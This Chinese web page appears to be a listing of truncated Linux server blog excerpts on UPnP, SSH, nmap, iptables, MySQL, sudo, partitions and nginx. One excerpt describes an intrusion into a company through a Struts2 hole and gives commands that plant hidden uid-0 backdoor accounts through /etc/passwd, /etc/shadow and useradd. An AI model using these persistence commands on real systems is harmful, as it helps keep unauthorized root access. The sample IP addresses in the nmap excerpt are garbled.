linux服务器

UPnP全名是Universal Plug and Play，主要是微软在推行的一个标准。简单的来说，UPnP 最大的愿景就是希望任何设备只要一接上网络，所有在网络上的设备马上就能知道有新设备加入，这些设备彼此之间能互相沟通，更能直接使用或控制它，一切都不需要设定，完全的Plug and Play。 ------------------------------------------------------------------------------------------------------- 关于UPnP协议栈 UPnP设备体系结构包含了设备之间、控制点之间、设备和控制点之间的通信。完整的UPnP由设备寻址、设备发现、设备描述、设备控制、事件通知和基于Html的描述界面几部分构成。 1. UPnP是一个多层协议构成的框架体系，每一层都以相邻的下层为基础，同时又是相邻上层的基础。直至达到应用层为止。该图中的最下面是就是IP和TCP，共两层，负责设备的IP地址。 2. 三层是HTTP、HTTPU、HTTPMU，这一层，属于传送协议层。传送的是内容都经过“封装”后，存放在特定的XML文件中的。对应的SSDP、GENA、SOAP指的是保存在XML文件中的数据格式。到这一层，已经解决了UPnP设备的IP地址和传送信息问题。 3. 第四层是UPnP设备体系定义，仅仅是一个抽象的

技术站点 Hacker News：非常棒的针对编程的链接聚合网站 Programming reddit：同上 MSDN：微软相关的官方技术集中地，主要是文档类 infoq：企业级应用，关注软件开发领域 OSChina：开源技术社区，开源方面做的不错哦 cnblogs，51cto，csdn：常见的技术社区，各有专长 stackoverflow：IT技术问答网站 GitHub：全球最大的源代码管理平台，很多知名开源项目都在上面，如Linux内核， OpenStack等免费的it电子书： http://it-ebooks.info/ DevStore:开发者服务商店 不错的书籍 人件 人月神话 代码大全2 计算机程序设计艺术 程序员的自我修养 程序员修炼之道 高效能程序员的修炼（成为一名杰出的程序员其实跟写代码没有太大关系） 深入理解计算机系统 软件随想录 算法导论（麻省理工学院出版社） 离线数学及其应用 设计模式 编程之美 黑客与画家 编程珠玑 C++ Prime Effective C++ TCP/IP详解 Unix 编程艺术 《精神分析引论》弗洛伊德 搞定：无压力工作的艺术 平台工具（都是开源的好东东哦） Redmine/Trac：项目管理平台 Jenkins/Jira(非开源)：持续集成系统（Apache Continuum，这个是Apache下的CI系统，还没来得及研究）

在一次渗透中，成功获取某目标几台比较重要的机器，当时只想着获取脱库，结果动静太大被发现了，之前渗透并没太在意Linux维持权限，经过此次事后从Google找各种资料，一款满意的rootkit都没有，现在一直在关注这方面，但还是没有找到满意的后门，在渗透圈一个人的资源总是有限往往你全力追求的，也不过是别人的一层关系就可以解决得到更有力的资源。 常用后门技术 增加超级用户帐号 破解/嗅控用户密码 放置SUID Shell ** 利用系统服务程序 TCP/UDP/ICMP Shell Crontab定时任务 共享库文件 工具包rootkit 可装载内枋模块(LKM) 增加超级用户 echo "mx7krshell:x:0:0::/:/bin/sh" >> /etc/passwd 如果系统不允许uid=0的用户远程登录，可以增加一个普通用户账号 echo "mx7krshell::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow 小案例 搞某外企，主站拿不下来进行C段渗透，发现某个业务系统存在Struts2漏洞。 Struts漏洞工具执行命令有些交互式没有办法回显，所以通过无密码添加密码来连接SSH： useradd seradd -u 0 -o -g root -G roo1 echo "123456" | passwd --stdin roo1

1、查看SSH客户端版本 使用 ssh -V命令 可以得到版本号。需要注意的是，Linux一般自带的是OpenSSH; 　 $ ssh -V ssh: SSH Secure Shell 3.2.9.1 (non-commercial version) on i686-pc-linux-gnu 2、连接远程主机 命令格式： $ ssh name@remoteserver 　$ ssh remoteserver -l name 说明：以上两种方式都可以远程登录到远程主机，server代表远程主机，name为登录远程主机的用户名。 3、连接远程主机指定的端口 $ ssh name@remoteserver -p 222 　$ ssh remoteserver -l name -p 222 说明：p 参数指定端口号，通常在路由里做端口映射时，我们不会把22端口直接映射出去，而是转换成其他端口号，这时就需要使用-p端口号命令格式。 4、通过远程主机1跳到远程主机 $ ssh -t remoteserver ssh remoteserver 说明：当远程主机remoteserver2无法直接到达时，可以使用-t参数，然后由remoteserver1跳转到remoteserver2。在此过程中要先输入remoteserver1的密码，然后再输入remoteserver2的密码

NMap，也就是Network Mapper，是Linux下的网络扫描和嗅探工 具包，其基本功能有三个，一是探测一组主机是否在线；其次是 扫描主机端口，嗅探所提供的网络服务；还可以推断主机所用的操作系统 。Nmap可用于扫描仅有两个节点的LAN，直至500个节点以上的网络。 Nmap 还允许用户定制扫描技巧。通常，一个简单的使用ICMP协议的ping操 作可以满足一般需求；也可以深入探测UDP或者TCP端口，直至主机 所使用的操作系统；还可以将所有探测结果记录到各种格式的日志中， 供进一步分析操作。 进行ping扫描，打印出对扫描做出响应的主机,不做进一步测试(如端口扫描或者操作系统探测)： nmap -sP 1Array2.168.1.0/24 仅列出指定网络上的每台主机，不发送任何报文到目标主机： nmap -sL 1Array2.168.1.0/24 探测目标主机开放的端口，可以指定一个以逗号分隔的端口列表(如-PS22，23，25，80)： nmap -PS 1Array2.168.1.234 使用UDP ping探测主机： nmap -PU 1Array2.168.1.0/24 使用频率最高的扫描选项：SYN扫描,又称为半开放扫描，它不打开一个完全的TCP连接，执行得很快： nmap -sS 1Array2.168.1.0/24 当SYN扫描不能用时，TCP

健忘啊，记下来吧 Red Hat Linux 系统 此类型系统包括 red hat 的各类衍生及相关不版本，包括 RHEL 、 CentOS 、 Fedora 等等。 防火墙配置文件： /etc/sysconfig/iptables 服务操作命令 ： /etc/init.d/iptables service iptables {start|stop...} 临时改变命令 ： iptables iptables-save iptables-restore 等 禁止端口： iptables -D FORWARD -p tcp --dport 8000 -j REJECT 打开端口： iptables -I INPUT -p tcp --dport 3690 -j ACCEPT 如果想永久开放端口，那就进入：vi /etc/sysconfig/iptables 在最后加上目标端口即可，保存退出后，使用：/sbin/service iptables restart 重启一下防火墙 另，附iptables指令详解：来自（http://bbs.chinaunix.net/thread-2204793-1-1.html） 语法： iptables [-t table] command [match] [-j target/jump] -t 参数 用来指定规则表，内建的规则表有三个，分别是：nat

转载自 https://www.cnblogs.com/xdzy/p/10147343.html 0）通过xshell连接到远程服务器 1）彻底删除原来安装的mysql 首先查看：rpm -qa|grep -i mysql 删除操作（一个一个删除）：yum remove '软件名' 查看关于mysql的文件：find / -name mysql 可以通过xftp直接删除 对于顽固的文件夹：rm -rf 文件名（删除） 2 ）下载mysql包： wget http://dev.mysql.com/get/mysql57-community-release-el7-11.noarch.rpm 安装： yum localinstall mysql57-community-release-el7-11.noarch.rpm 查看是否安装成功： yum repolist enabled | grep "mysql.*-community.*" 3） 安装mysql： yum install mysql-community-server 启动mysql： systemctl start mysqld 关闭mysql： systemctl stop mysqld 查看是否启动： systemctl status mysqld 4 ）设置开机自启： systemctl enable mysqld

简短介绍 su与su - su 切换到root用户，但是并没有转到root用户家目录下，即没有改变用户的环境。 su - 切换到root用户，并转到root用户的家目录下，即改变到了root用户的环境。 这个涉及到不同用户下的环境变量的配置。 sudo 通过sudo，我们能把某些超级权限有针对性的下放，并且不需要普通用户知道root密码（sudo用的不是root密码，而是当前用户密码），所以sudo相对于权限无限制性的su来说，还是比较安全的，所以sudo也能被称为受限制的su，另外sudo是需要授权许可的，所以也被称为授权许可的su。 sudo执行命令的流程是当前用户切换到root（或其他指定切换到的用户），然后以root（或其他指定的切换到的用户）身份执行命令，执行完成后，直接退回到当前用户，而这些的前提是要通过sudo的配置文件/etc/sudoers来进行授权。 sudo的配置文件是/etc/sudoers,我们可以用他的专用编辑工具visodu来进行配置，配置好后，可以切换到您授权的用户下，通过sudo -l来查看哪些命令是可以执行或禁止的。 之所以把这三个命令拿出来，是要提醒自己这三个命令是有区别的，在使用时遇到错误就要仔细想一下。 至于怎样配置使用sudo，一般不做服务器管理应该用不到，这里不做详细介绍，需要的时候可以去学习。 详细介绍 一.su

分区类型： 主分区--最多四个 扩展分区--只能有一个，也算作主分区的一种，用于包含逻辑分区 逻辑分区--在扩展分区中划分 IDE硬盘最多支持59个 SCSI硬盘最多支持11个 —————————————————————————————— 分区表示方法： 主分区1：/dev/sda1 主分区2：/dev/sda2 主分区3：/dev/sda3 扩展分区：/dev/sda4 逻辑分区1：/dev/sda5 逻辑分区2：/dev/sda6 逻辑分区3：/dev/sda7 主分区1：/dev/sda1 扩展分区：/dev/sda2 逻辑分区1：/dev/sda5 逻辑分区2：/dev/sda6 逻辑分区3：/dev/sda7 —————————————————————————————— 文件系统 ext2: ext2是ext文件系统的升级版本，RedHat Linux7.2版本以前的系统默认都是ext2文件系统。1993年发布，最大支持16TB的分区和2TB的文件。 (1TB = 1024GB = 1024*1024MB) ext3: ext3文件系统是ext2文件系统的升级版本，最大的区别就是带日志功能，以在系统突然停止时提高文件系统的可靠性。支持最大16TB的分区和最大2TB的文件。 ext4: ext4文件系统是ext3文件系统的升级版。ext4在性能、伸缩性

【简介】 Nginx 是一个很牛的高性能 Web 和 反向代理 服务器，它具有有很多非常优越的特性： 在高连接并发的情况下，Nginx 是 Apache 服务器不错的替代品： Nginx 在美国是做虚拟主机生意的老板们经常选择的软件平台之一。 能够支持高达 50,000 个并发连接数的响应， 感谢 Nginx 为我们选择了 epoll and kqueue 作为开发模型.。 Nginx 作为 负载均衡 服务器： Nginx 既可以在内部直接支持 Rails 和 PHP 程序对外进行服务，也可以支持作为 HTTP 代理服务器对外进行服务。 Nginx 采用 C 进行编写， 不论是系统资源开销还是 CPU 使用效率都比 Perlbal 要好很多。 作为邮件代理服务器： Nginx 同时也是一个非常优秀的邮件代理服务器（最早开发这个产品的目的之一也是作为邮件代理服务器）， Last.fm 描述了成功并且美妙的使用经验。 Nginx 是一个安装非常简单，配置文件非常简洁（还能够支持perl语法）， Bugs非常少的服务器： Nginx 启动特别容易，并且几乎可以做到 7*24 不间断运行，即使运行数个月也不需要重新启动。 你还能够不间断服务的情况下进行软件版本的升级。 【Nginx 概述】 HTTP 基础功能： 处理静态文件，索引文件以及自动索引； 反向代理加速(无缓存)